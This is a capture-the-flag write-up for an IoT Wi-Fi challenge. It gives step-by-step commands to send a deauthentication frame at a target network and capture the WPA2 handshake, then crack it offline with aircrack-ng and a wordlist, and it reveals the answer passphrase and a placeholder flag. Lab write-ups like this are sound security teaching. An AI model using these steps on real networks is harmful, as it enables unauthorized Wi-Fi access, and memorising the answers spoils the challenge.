2.3 KiB
Cr4cK_W1F1
| Field | Value |
|---|---|
| Category | IoT |
| Difficulty | Medium |
| Points | TBD |
| Author | Eun0us |
| CTF | Espilon 2026 |
Description
You recover a UART access on a red team WiFi sniffer tool. Analyze the captured data to recover the WiFi password, then connect to the network and retrieve the flag.
- TX (read UART): port 1111
- RX (write UART): port 2222
TL;DR
Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART
output (base64-encoded), crack the handshake with aircrack-ng and rockyou.txt to find
the passphrase sunshine, then connect and read the flag.
Tools
| Tool | Purpose |
|---|---|
nc |
Connect to UART TX/RX ports |
base64 |
Decode the PCAP blob |
aircrack-ng |
Crack WPA2 handshake |
rockyou.txt |
Password wordlist |
Solution
Step 1 — Open both UART channels
# Terminal 1 — TX (read output)
nc <host> 1111
# Terminal 2 — RX (send commands)
nc <host> 2222
📸
[screenshot: two terminals showing TX output and RX prompt]
Step 2 — Start the sniffer and force a deauth
In the RX terminal:
sniffer start
deauth TestNet 02:00:00:aa:00:01
sniffer stop
The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake.
Step 3 — Extract the PCAP from TX
On the TX terminal, output appears between markers:
PCAP_BASE64_BEGIN
<base64 data>
PCAP_BASE64_END
Copy the base64 lines to a file and decode:
base64 -d handshake.b64 > handshake.pcap
📸
[screenshot: TX output showing the PCAP_BASE64 markers]
Step 4 — Crack the WPA2 handshake
aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
Output:
KEY FOUND! [ sunshine ]
📸
[screenshot: aircrack-ng finding the key]
Step 5 — Connect and read the flag
In the RX terminal:
connect TestNet sunshine
cat /flag.txt
📸
[screenshot: RX terminal returning the flag after connecting to the network]
Flag
CTF{CR4CK_W1F1_EXAMPLE}
Note: This challenge was still being finalized at time of writing. The flag above is a placeholder; the real flag will be updated before deployment.